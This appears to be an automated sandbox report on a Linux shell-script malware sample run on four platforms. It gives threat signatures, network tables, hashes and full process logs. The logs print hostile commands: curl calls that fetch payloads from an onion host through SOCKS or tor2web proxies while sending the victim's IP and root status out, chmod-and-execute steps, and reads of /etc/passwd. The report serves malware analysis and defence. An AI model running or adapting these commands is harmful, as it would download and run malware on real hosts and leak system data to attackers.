Analysis Overview
SHA256
d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
Threat Level: Shows suspicious behavior
The file 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Looks up external IP address via web service
Deobfuscate/Decode Files or Information
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-24 18:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:09
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/bin/bash
[bash]
/usr/bin/base64
[base64 -d]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/bin/grep
[grep -Ev [.]0]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/md5sum
[md5sum]
/bin/date
[date]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | doh-fi.blahdns.com | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.6:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:09
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
15s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/usr/bin/base64
[base64 -d]
/bin/bash
[bash]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://dns.digitale-gesellschaft.ch/dns-query?name=relay.tor2socks.in]
/usr/bin/sort
[sort -uR]
/bin/grep
[grep -Ev [.]0]
/usr/bin/head
[head -n 1]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | dns.digitale-gesellschaft.ch | udp |
| CH | 185.95.218.42:443 | dns.digitale-gesellschaft.ch | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:13
Platform
debian9-mipsbe-20240611-en
Max time kernel
87s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/bin/bash
[bash]
/usr/bin/base64
[base64 -d]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/bin/grep
[grep -Ev [.]0]
/usr/bin/head
[head -n 1]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $2}]
/usr/bin/base64
[base64 -w0]
/usr/bin/crontab
[crontab -l]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]
/bin/chmod
[chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]
/tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222
[./e8eb0a2cdf54c3ac6d6c2fd3f5796222]
/bin/rm
[rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]
/bin/grep
[grep -Ev [.]0]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $2}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 34.254.128.37:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | dns.twnic.tw | udp |
| TW | 101.101.101.101:443 | dns.twnic.tw | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 34.254.128.37:80 | checkip.amazonaws.com | tcp |
| FI | 65.108.216.128:9050 | tcp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-24 18:05
Reported
2024-10-24 18:13
Platform
debian9-mipsel-20240226-en
Max time kernel
124s
Max time network
138s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/i | /tmp/i | N/A |
| N/A | /tmp/i | /tmp/i | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/base64 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/id | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /sbin/ip | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /sbin/ip | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/i | /bin/bash | N/A |
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]
/bin/bash
[bash]
/usr/bin/base64
[base64 -d]
/usr/bin/cut
[cut -d: -f6]
/usr/bin/id
[id -u]
/bin/grep
[grep x:0: /etc/passwd]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/bin/grep
[grep -Ev [.]0]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $1}]
/sbin/ip
[ip a]
/usr/bin/awk
[awk {print $2}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/bin/chmod
[chmod +x ./3d4e2c62a0f0444c5e39a768425ab056]
/tmp/3d4e2c62a0f0444c5e39a768425ab056
[./3d4e2c62a0f0444c5e39a768425ab056]
/bin/rm
[rm -f ./3d4e2c62a0f0444c5e39a768425ab056]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/sort
[sort -uR]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]
/usr/bin/head
[head -n 1]
/bin/grep
[grep -Ev [.]0]
/bin/uname
[uname -m]
/usr/bin/cut
[cut -f1 -d-]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $2}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/base64
[base64 -w0]
/usr/bin/crontab
[crontab -l]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/bin/chmod
[chmod +x ./b18c7b90793d1614c38108eb109f833e]
/tmp/b18c7b90793d1614c38108eb109f833e
[./b18c7b90793d1614c38108eb109f833e]
/bin/rm
[rm -f ./b18c7b90793d1614c38108eb109f833e]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/bin/grep
[grep -Ev [.]0]
/usr/bin/sort
[sort -uR]
/usr/bin/head
[head -n 1]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://uncensored.lux1.dns.nixnet.xyz/dns-query?name=relay.tor2socks.in]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/awk
[awk {print $2}]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $1}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/usr/bin/curl
[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
/bin/chmod
[chmod +x ./5f3b49ef027eb052018f97a43d59ca89]
/dev/shm/5f3b49ef027eb052018f97a43d59ca89
[./5f3b49ef027eb052018f97a43d59ca89]
/bin/rm
[rm -f ./5f3b49ef027eb052018f97a43d59ca89]
/usr/bin/head
[head -n 1 /tmp/.X11-unix/01]
/bin/ls
[ls /proc//status]
/bin/chmod
[chmod +x ./i]
/tmp/i
[./i]
/bin/rm
[rm -f i]
/bin/grep
[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]
/usr/bin/tr
[tr \n]
/usr/bin/curl
[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]
/usr/bin/head
[head -n 1]
/usr/bin/sort
[sort -uR]
/bin/grep
[grep -Ev [.]0]
/bin/uname
[uname -m]
/bin/date
[date]
/usr/bin/md5sum
[md5sum]
/usr/bin/cut
[cut -f1 -d-]
/usr/bin/curl
[curl -4fsSLk checkip.amazonaws.com]
/usr/bin/whoami
[whoami]
/bin/uname
[uname -m]
/bin/uname
[uname -n]
/sbin/ip
[ip a]
/bin/grep
[grep inet ]
/usr/bin/md5sum
[md5sum]
/usr/bin/awk
[awk {print $2}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/crontab
[crontab -l]
/usr/bin/base64
[base64 -w0]
/usr/bin/curl
[curl -4fsSLkA- -m200 -x socks5h://5.10.228.248:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./1b8f4bb809b6d9f7810d0d4d1656553c -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | doh-fi.blahdns.com | udp |
| US | 1.1.1.1:53 | doh-fi.blahdns.com | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 54.78.143.177:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | doh.no.ahadns.net | udp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 52.212.103.61:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | uncensored.lux1.dns.nixnet.xyz | udp |
| LU | 104.244.78.231:443 | uncensored.lux1.dns.nixnet.xyz | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 54.78.143.177:80 | checkip.amazonaws.com | tcp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion | udp |
| US | 1.1.1.1:53 | ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in | udp |
| US | 1.1.1.1:53 | dns.twnic.tw | udp |
| TW | 101.101.101.101:443 | dns.twnic.tw | tcp |
| US | 1.1.1.1:53 | checkip.amazonaws.com | udp |
| IE | 54.78.143.177:80 | checkip.amazonaws.com | tcp |
| IQ | 5.10.228.248:9050 | tcp |
Files
/tmp/i
| MD5 | f4b524261fce06c1fbd10b4681ad0b97 |
| SHA1 | c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d |
| SHA256 | 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031 |
| SHA512 | ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449 |